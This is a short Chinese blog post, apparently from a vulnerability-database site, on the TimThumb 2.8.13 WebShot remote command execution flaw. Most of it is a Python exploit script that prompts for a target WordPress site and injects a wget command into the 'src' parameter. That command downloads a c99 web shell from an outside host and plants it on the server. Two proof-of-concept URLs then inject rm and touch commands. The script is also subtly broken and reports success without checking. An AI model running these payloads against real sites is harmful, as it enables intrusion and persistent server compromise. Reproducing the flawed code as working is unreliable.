TimThumb 2.8.13 RCE远程命令执行漏洞
- 发表于
- Vulndb
timthumb.php <= 2.8.13 WebShot 'src'参数远程命令执行漏洞,这是一个之前的漏洞。TimThumb最新版是2.8.14,但很多程序都在使用小于该版本的文件,导致依然存在大量漏洞。记录一下。
TimThumb exp
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
# [+] TimThumb <= 2.8.13 Exploit # ============================================================ # http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>) import os,sys,urllib2 os.system('clear') def banner(): print ''' -- UrduSecurity Exploits -- -- TimThumb 2.8.13 Remote Code Execution -- -- Author: Muhammad Adeel -- -- blog: http://urduSecurity.blogspot.com\n\n''' def usage(): print ''' -- Usage: python UrduSecurity-Exploit.py --\n''' banner() usage() host = raw_input('Enter Target Host[anything.com]: ') theme = raw_input('Theme Name[parallax or any which you find]: ') def getShell(): prepayload = urllib2.urlencode('http://'+host+'/wp-content/themes/'+theme+'/themify/img.php?webshot=1&src=http://'+host+'/$(wget http://www.c99php.com/shell/c99.txt; mv c99.txt shell.php)') payload = urllib2.urlopen(prepayload) print '\n' while True: try: print "[+] Shell Uploaded! Find Your Shell in Theme Directory." banner() sys.exit() except: print 'Not Success, Might be site Patched.' pass getShell() def main(): banner() usage() if __name__ == '__main__': main() |
TimThumb poc
|
1 2 |
http://site.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://site.com/$(rm$IFS/tmp/a.txt) http://site.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=http://site.com/$(touch$IFS/tmp/a.txt) |
